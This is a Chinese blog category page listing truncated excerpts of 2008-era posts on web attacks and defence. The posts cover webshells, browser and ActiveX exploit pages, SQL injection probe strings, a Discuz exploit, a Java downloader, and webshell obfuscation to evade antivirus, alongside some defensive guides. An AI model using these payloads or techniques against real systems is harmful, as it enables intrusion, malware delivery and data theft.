
脚本网页语言安全和网站攻防
文章平均质量分 70
iiprogram
残云收夏暑,新雨带秋岚!
展开
-
Aspxshell 1.1 开源发布
作者:cnqing一、目录结构Aspxshell├─插件目录├─插件目录├─…….├─…….└─Loader 程序加载器├─bin│ ├─Debug 程序发布目录│ │ └─remoter 插件远程程序集目录。。。。。二、客户端向服务端POST数据结构程序集 nbyte 长度定义在cooki原创 2008-11-20 17:15:00 · 1596 阅读 · 0 评论 -
IE0DAY网马
这个漏洞参考http://www.milw0rm.com/exploits/5619Author: Greysign2008-5-24http://www.scanw.com/blog哈哈。标题吸引吗。修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。这个漏洞执行后可以远程下载任意文件并执行。第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。原创 2008-05-28 00:40:00 · 988 阅读 · 0 评论 -
对MS word javascript execution的一些测试
<!--google_ad_client = "pub-1460049757379518";/* 200x200, 创建于 08-5-2 */google_ad_slot = "0491039036";google_ad_width = 200;google_ad_height = 200;//-->作者:余弦来源:0×37 SecurityMi原创 2008-05-28 00:46:00 · 643 阅读 · 0 评论 -
Vista Worm
# sk0r alias Czybiks Powershell Skript Worm # # This worm is for the PowerShell Script Interpreter# which is included with Microsoft Windows Vista# # This worm is ¸2006 by sk0r alias Czybik# # Visit原创 2008-05-15 23:29:00 · 1133 阅读 · 0 评论 -
Gh0st上线更新专用ASP文件
input {font-family: “Verdana”;font-size: “11px”;BACKGROUND-COLOR: “#FFFFFF”;height: “18px”;border: “1px solid #666666″;}body ,td{font-size: 11px; font-family: Verdana;}if request.form(”str”) “” thenif原创 2008-05-14 14:54:00 · 1016 阅读 · 0 评论 -
VBS病毒解密初探
1。加密的VBS病毒: 引用:0.1aa="(( 5.6}{=|5.6|}{=||}{=|.|}{=|K O V|& }{=|F W 65.65|}{=(659)&(661)&(661)&(667)&|://|&(30)&|.|原创 2008-05-08 17:53:00 · 2196 阅读 · 0 评论 -
w18.vg/lz.gif网马解密之粗浅分析
1.网马网页地址:hxxp://w18.vg/lz.gif2.记事本打开内容如下:rO91="d/rPPP/|/rh",eU44="hdP/`Pp///rq/}///";.3800981,xL41="4.352468E-02",eU44=/:r/{//ecZvy/)D/+/./*k/>Po/_EnKQ5R/(/ I6h/~/r/!jH/"0Filw/?g/%//f8X/,OAzB/[/`mWS原创 2008-05-08 17:50:00 · 2283 阅读 · 0 评论 -
Dvbbs 8.2 login_sql注入漏洞探析
挺无聊的,分析下”洞网/”,环境架好后.找到有问题的语句: End If Else username=trim(Dvbbs.CheckStr(request("username"))) If ajaxPro Then username = unescape(username) End If原创 2008-07-17 10:03:00 · 2882 阅读 · 0 评论 -
MS Office Snapshot Viewer ActiveX Exploit 最新网马
经本站焦点核(X)安全技术咨询站测试 确实可以执行 被360拦截 微软尚未发布补丁可执行版,请勿用于非法用途。function killErrors() {return true;}window.onerror = killErrors;var x;var obj;var mycars = new Array();mycars[0] = "c:/Program Files/Outlook原创 2008-07-16 11:18:00 · 882 阅读 · 0 评论 -
Z-blog跨站脚本攻击漏洞
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。漏洞厂原创 2008-07-15 15:06:00 · 1479 阅读 · 0 评论 -
利用最基本的SQL注入渗透BBSXP官方网站的台后管理(科普)
漏洞分析 序:有一部电影的名字叫着《全职杀手》,剧中的男主角托尔,我非常喜欢他的个性!他非常的cool,i like!呵呵,不知道你看过这部电影没有?不过,我今天要为大家讲解的故事发现在网络当中.这次是一次非常,常见的sql渗透攻击.也是最基础的.过程如下:1.找出漏洞并分析漏洞.2.利用漏洞,得到前台区长密码.3.利用漏洞,得到后台密码.4.添加公告,闪人!开始工作:到bbsxp官方网站下载最原创 2008-07-17 10:07:00 · 1517 阅读 · 2 评论 -
sql server 2005注入技巧集
[sql server 2005,检测权限]and 1=(select IS_SRVROLEMEMBER(sysadmin))and 1=(select IS_SRVROLEMEMBER(serveradmin))and 1=(select IS_SRVROLEMEMBER(setupadmin))and 1=(select IS_SRVROLEMEMBER(securit原创 2008-07-17 09:58:00 · 1523 阅读 · 0 评论 -
The Week of Baidu Bugs - Day 05: 百度空间多处XSS漏洞
继续我们的XSS之旅,先来看一个YY漏洞XSS 5: 百度PDC CallBack XSS漏洞baidu pdc的imstate从名字上来看似乎是用来查询IM在线情况的,正常情况下的一个请求大致如下:http://pdc.baidu.com/imstate/?callback=IM_STATUS_CALLBACK&type=json&uids=testuser这个页面会返回一个jso原创 2008-07-16 11:22:00 · 878 阅读 · 0 评论 -
2008 网马王网站分析
发现一个网站被挂马....于是就开始动手解马...因为版面有限!所以一些解码过程就不写了...有兴趣的人可以分析看看.下列所有网马把漏洞还有加密方式用的淋淋尽致...如果想要练习网马分析的...这个是不错的例子..分析被挂马的网站 www.garden-ms.com开始延伸 RealPlayer ActiveX控件栈溢出漏原创 2008-05-08 17:51:00 · 1831 阅读 · 0 评论 -
PHP数据库安全之SQL注入
很多 web 开发者没有注意到 SQL 查询是可以被篡改的,因而把 SQL 查询当作可信任的命令。殊不知道,SQL 查询可以绕开访问控制,从而绕过身份验证和权限检查。更有甚者,有可能通过 SQL 查询去运行主机操作系统级的命令。 直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技术,从而达到取得隐藏数据,或覆盖关键的值,甚至执行数据库主机操作系统命令的目的。这是通原创 2008-07-17 09:38:00 · 945 阅读 · 0 评论 -
最近流行的14种第三方0day挂马防御措施
14种常见软件的0day防御措施: RealPlayer,暴风影音,PPStream,迅雷,联众世界,百度搜霸工具条,Adobe Reader,Qvod player,腾讯QQ,PPLive,Flash player,Skype ,QuickTime,超星阅读器! 【RealPlayer】 1. 漏洞说明 RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件原创 2008-07-15 12:02:00 · 920 阅读 · 0 评论 -
CSRF: 不要低估了我的危害和攻击能力
CSRF这种攻击方式虽然提出来很久(在2006年的时候就有了)了,但是这个沉睡的攻击巨人直到前不久才逐渐走入我们的视线,到底CSRF是啥,危害到底有多大?常见的利用方式是如何的,今天作为“安全相关 | Security”分类的第一篇文章,我按照自己的理解告诉你,不要低估了CSRF危害性和攻击能力。一、什么是CSRF先看看CSRF的原文说明,如下:Cross Site Reference原创 2008-05-28 00:47:00 · 1041 阅读 · 0 评论 -
一个扩展dir命令的vbs脚本
作者:lcx来源:vbs小铺‘CMD下的dir好像没法列出从某段时间到某段时间的文件,所以写了这个小东东set Arg=Wscript.ArgumentsIf Arg.Count=0 thenWscript.echo chr(9)&chr(9)&space(4)&”Xdir v0.1″Wscript.echo “”Wscript.echo chr(9)&”cscript dir.vbs p原创 2008-05-28 01:23:00 · 1319 阅读 · 0 评论 -
Sql2005注入辅助脚本[修改版]
from hackbase版权所有:http://www.pcsec.orgBK瞬间群感谢无敌小黄瓜的投递原始代码可见http://hi.baidu.com/tr4c3/blog/item/da1c1c30c93da89ca9018e27.html经过黄瓜修改代码,功能更加强大了,希望能给大家的渗透工作带来方便。程序说明:+========== ===================原创 2008-11-20 17:13:00 · 1126 阅读 · 0 评论 -
Discuz! 6.x/7.x SODB-2008-13 Exp
from sebug.net测试方法:[www.sebug.net]本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#!/usr/bin/php/** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */$host = www.80vul.com;// 服务器域名或IP$p原创 2008-11-20 17:11:00 · 1102 阅读 · 0 评论 -
制作安全网站的checklist
from idv2 fcicq最近在IPA上看到一篇安全相关的文章,它的最末尾有个checklist,于是催我把它翻译了。前几天比较忙,周末没什么事儿了,就翻译一下吧。原文的标题是如何让网站更安全。这里仅翻译文章最后的一个checklist。2008/4/20更新:fcicq倒是神速啊,马上就把具体的应用策略扔出来了 参考:PHP 实践 Security Checklist标原创 2008-10-20 10:39:00 · 732 阅读 · 0 评论 -
犀利的 oracle 注入技术
介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成/xxx.jsp?id=1 and 1的形式即可。(用" a|| "是为了让语句返回true值)语句有点长,可能要用post提交。以下是各个步骤:原创 2008-10-20 10:45:00 · 777 阅读 · 0 评论 -
Java 下载者 IE & FF
import java.applet.Applet; import java.io.*; import java.net.URL; import java.net.URLConnection; public class Client extends Applet { public Client() { } public void start() {原创 2008-10-15 10:34:00 · 830 阅读 · 0 评论 -
点击劫持(Clickjacking)漏洞技术内幕
Clickjacking是OWASP_NYC_AppSec_2008_Conference的一个保密的议题,以下是一些攻击的描叙: 当你访问一个恶意网站的时候,攻击者可以控制你的浏览器对一些链接的访问,这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件,除非你使用lynx一类的字符浏览器。 这个漏洞与JavaScript无关,即使你关闭浏览器的JavaScr原创 2008-10-15 08:59:00 · 1133 阅读 · 0 评论 -
Asp木马技术分析
Asp木马技术分析现在很多的站点,为便于建站和后台管理,都使用ASP动态程序。但这也为整个站点的安全带来很大隐患,现在典型的网站攻击就是通过植入ASP木马,从而得到系统的控制权。早期的asp木马一般有数个文件,随着asp木马的易用性、隐蔽性以及强大的可执行性,因此得到越来越的黑客和入侵者的青睐,asp木马技术也就水涨船高,现在的asp木马文件已原创 2008-08-28 10:53:00 · 1407 阅读 · 0 评论 -
关于AJAX注入
来源:0x37 SecurityAJAX可以让数据在后台无声无息地进行,假如有办法让你的JS脚本与这个AJAX模块在同域内的话,那可以使用这个XSS来完成二次攻击,并且可以通过XHR对象的status属性来判断返回结果的正确与否。GET型的AJAX,直接构造URL里的参数值;POST型的AJAX,则构造好XHR对象的send方法里的参数值。一般借用AJAX来完成的攻击,很难被用户察觉,除原创 2008-08-28 10:50:00 · 1400 阅读 · 0 评论 -
ASP加密
大家在入侵中应该是捡到过别人的Webshell吧?也许有的大马功能很好,于是你就用了,但是你没想过该马可能有后门?现在很多的大马都加密了,打开时候一片乱码,是不是也想加密自己的大马了,加密后的Webshell不仅可以防止别人捡我们的Shell用,还能免杀webshell。ASP木马加密不难,让我们一起踏上大马加密之旅。 一:人工加密 1.主加密函数的编写 1)主解密与解密原创 2008-08-28 10:50:00 · 2497 阅读 · 0 评论 -
Perl Underground 5
$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ %%%%%%%% X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ %%%%%%%% x H H $$原创 2008-08-26 00:07:00 · 13456 阅读 · 0 评论 -
Cross Site Scripting - Attack and Defense guide
____ / / ________________________________原创 2008-08-26 00:05:00 · 2354 阅读 · 0 评论 -
编程通过WMI获取系统信息
要了解WMI,请查阅:http://www.microsoft.com/china/technet/community/scriptcenter/resources/wmifaq.mspx#EJC 。 WMI是一组COM对象,其接口比较多,详细请参考:http://msdn.microsoft.com/library/default.asp?url=/library/原创 2008-08-26 16:59:00 · 2646 阅读 · 0 评论 -
vbs 一些脚本
什么是 Runomatic?你不想我们来破坏你自己找到答案时的那种惊奇感,是吧?任务1:检索计算机名老实告诉你吧,通过脚本来检索计算机名的途径数不胜数。但是因为 WMI 将要成为检索信息的主流技术,所以我们所展示的是一段返回目标计算机名称的 WMI 脚本。strComputer = "."Set objWMIService = GetObject("winmgmts://" & strCompu原创 2008-08-26 15:49:00 · 2113 阅读 · 0 评论 -
一次通过 Oracle8i 入侵系统之旅
来源:冷漠s BlogAuthor:Mickey最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.。先用 SuperScan4.0 扫描下要测试的主机,速度很快,结果如图 1 所示:图 1端口 1521 是 Oracle 的 TNS Listener 默认监听的端口,通过扫描报告还可以看到 Oracle 的版本为 8i.现在还不 知道对方的操作系原创 2008-05-29 15:25:00 · 863 阅读 · 0 评论 -
批处理的api–WMIC学习体会
上期的专栏里,NP给大家写了一篇很精彩也很有实际应用效果的批处理教程。这期,我给大家讲一下最近我学习wmic的体会。在这篇文章里也许你看不 到很多奇特有用的的实际例程,但是呢,授人以鱼不如授人以渔,希望我的文章能让你通俗易懂的了解一些wmic的基本知识,可以有一个学习的兴趣,让自己继 续深研一下wmic。在WINDOWS/Help目下,wmic.chm文档是这样解释wmi的:Windows Man原创 2008-05-28 00:08:00 · 1055 阅读 · 0 评论 -
输入小助手.vbs
有时,渗透时,溢出得个SHELL,或只有一个CMDSHELL,想下载些东西,或上传东西,时真是不方便啊 特别是当目标不能上网,或限制比较严格时… ECHO东西,手工输入,那个累啊….还是弄个脚本方便些… //把要ECHO的脚本,拖到此脚本上...根据提示操作即可 On Error Resume NextSet Arg=Wscript.argumentsIf Arg.count=0原创 2008-04-30 17:32:00 · 1153 阅读 · 0 评论 -
比较流行的数据库挂马
google_ad_client="pub-6065469188450680";google_ad_width=728;google_ad_height=90;google_ad_format="728x90_as";google_ad_type="text_image";google_ad_channel="6872543818";2007-01-10 15:00原创 2008-04-30 16:37:00 · 946 阅读 · 0 评论 -
跨站脚本-攻击和防御指向
摘要:1>什么是XSS?2>XSS脚本攻击3>制造一个cookie攻击4>保护XSS5>笨方法6>过滤绕过7>Flash攻击8>XSS 上传9>XSS 钓鱼____ ____/ / / /______/ /_____________________________________/ /______| / / / / || / /.:Chapter 1 - 什么是XSS? :./ / ||___/原创 2008-04-30 17:29:00 · 1309 阅读 · 0 评论 -
expect应用一例
注:执行需要安装有expect解释器检查netscreen防火墙shell+expect编写shell代码如下,重复执行expect调用,list.txt文件为要检查的防火墙信息其它设备检查也可做参考(应用于telnet)savedate=$IFSIFS=:filelog="`date +%Y-%m-%d`.log" > $filelogwhile read ipaddr username转载 2007-09-14 09:08:00 · 1255 阅读 · 0 评论 -
监控并中止QQ及QQgame进程 的vbs 脚本
监控并中止QQ及QQgame进程,同样可以用于中断其他程序进程,只要将进程的name写入stop_qq.txt此脚本由 wscript.exe 脚本解析程序负责解析执行.此脚本是死循环程序,要中断此脚本只需要在STOP_QQ.TXT 中填入含有 “WSCRIPT.EXE” 内容的记录并保存(Ctrl+S),脚本会将自身中断。当程序中断以后再删除 "wscript.exe" 数据,以确保下次能转载 2007-09-04 09:55:00 · 1132 阅读 · 0 评论 -
vbs+hta 实现同时关闭多个系统进程
本代码通过 xp mshta.exe 解析执行-----------------------------------------------------------------------------------进程中断APPLICATIONNAME="进程中断"BORDER="THICK"caption="进程中断"maximizebotton="yes"minmizebutton="yes"s转载 2007-09-04 09:50:00 · 1478 阅读 · 0 评论 -
防范SQL注入式攻击
SQL注入式攻击是利用是指利用设计上的漏洞,在目标服务器上运行Sql命令以及进行其他方式的攻击动态生成Sql命令时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。比如:如果你的查询语句是select * from admin where username="&user&" and password="&pwd&"" 那么,如果我的用户名是:1 or 1=1 那么,你的查询语句将转载 2007-06-04 09:08:00 · 1151 阅读 · 0 评论